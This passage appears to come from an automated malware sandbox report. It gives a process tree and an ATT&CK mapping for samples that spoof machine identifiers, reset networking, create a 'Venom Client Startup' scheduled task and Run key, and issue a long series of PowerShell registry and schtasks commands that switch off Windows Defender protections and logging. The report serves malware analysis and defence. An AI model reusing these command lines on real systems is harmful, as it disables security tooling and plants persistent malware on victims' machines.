    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
    3⤵
    PID:1964
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
      4⤵
      Modifies registry key
      PID:580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f
    3⤵
    PID:1248
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f
      4⤵
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:560
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 1211884352518014677230127063123232355628710278722563 /f
      4⤵
      Modifies registry class
      Modifies registry key
      PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1532
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 1212219183102765973126163099015435206291245421724 /f
      4⤵
      Modifies registry key
      PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2016
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 1212219183102765973126163099015435206291245421724241531941 /f
      4⤵
      Modifies registry key
      PID:692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:240
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 1212219183102765973126163099015435206291245421724241531941 /f
      4⤵
      Modifies registry key
      PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1944
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 12122191831027659731261630990154352062912454 /f
      4⤵
      Modifies Internet Explorer settings
      PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:2000
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 121221918310276 /f
      4⤵
      Modifies registry key
      PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:580
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 121221918310276 /f
      4⤵
      PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:1624
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 121221918310276 /f
      4⤵
      Modifies registry key
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:1456
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d 121221918310276 /f
      4⤵
      Modifies registry key
      PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1444
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 1212219183102765973126163099015435206291245421724241531941 /f
      4⤵
      PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.%random%.%random%-%random%_%random%%random% /f
    3⤵
    PID:1984
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.12122.19183-10276_597312616 /f
      4⤵
      Modifies registry key
      PID:1532
    - - C:\Windows\system32\netsh.exe
        
        netsh int ip reset
        5⤵
        
        PID:852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f
    3⤵
    PID:692
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {12122-19183-10276-5973} /f
      4⤵
      PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f
    3⤵
    PID:760
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f
      4⤵
      Modifies registry key
      PID:240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f
    3⤵
    PID:1476
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f
      4⤵
      Modifies registry key
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f
    3⤵
    PID:1280
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f
      4⤵
      PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh winsock reset
    3⤵
    PID:1524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int ip reset
    3⤵
    PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall reset
    3⤵
    PID:520
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall reset
      4⤵
      PID:788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /flushdns
    3⤵
    PID:1912
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /flushdns
      4⤵
      Gathers network information
      PID:1268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /release
    3⤵
    PID:1984
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:1104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /renew
    3⤵
    PID:1932
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /renew
      4⤵
      Gathers network information
      PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c arp -d
    3⤵
    PID:2160
  - - C:\Windows\system32\ARP.EXE
      arp -d
      4⤵
      PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh interface ip delete arpcache
    3⤵
    PID:2248
  - - C:\Windows\system32\netsh.exe
      netsh interface ip delete arpcache
      4⤵
      PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Windows\IME\networkclean.exe
    3⤵
    PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2344
- C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe
  "C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1492
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:2024
- - C:\Windows\SysWOW64\Images.exe
    "C:\Windows\SysWOW64\Images.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1440
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:1880
  - - C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs
      4⤵
      PID:692
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution2.vbs"
      4⤵
      PID:240
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"
      4⤵
      PID:1872
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
      4⤵
      PID:2016
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:1644
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:1100
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:2052
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
      4⤵
      PID:2092
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:2116
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:2152
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:2188
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:2228
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      PID:2256
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:2292
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      PID:2360
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:2408
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:2384
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:2444
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:2472
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:2484
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:2532
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:2544
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:2580
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:2608
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      PID:2628
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      PID:2664
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2696
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2720
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2748
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:2764
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:2788
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\乇ﾶんんﾒ乃のＷんﾌズズﾌ尺Ｗﾒ.bat" "
      4⤵
      PID:2796
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\りズ√ｲﾉりひ尺乃尺ᄃひｱ乃Ｗﾉ.bat" "
    3⤵
    PID:1984
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      PID:1944
  - - C:\Windows\SysWOW64\PING.EXE
      ping -\Common 10 localhost
      4⤵
      Runs ping.exe
      PID:1196
- C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe
  "C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:848

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:1716

C:\Windows\IME\networkclean.exe
C:\Windows\IME\networkclean.exe
1⤵
PID:2324
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4357.tmp\4358.tmp\4359.bat C:\Windows\IME\networkclean.exe"
  2⤵
  PID:2432

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Discovery

Query Registry

Remote System Discovery

T1018

System Information Discovery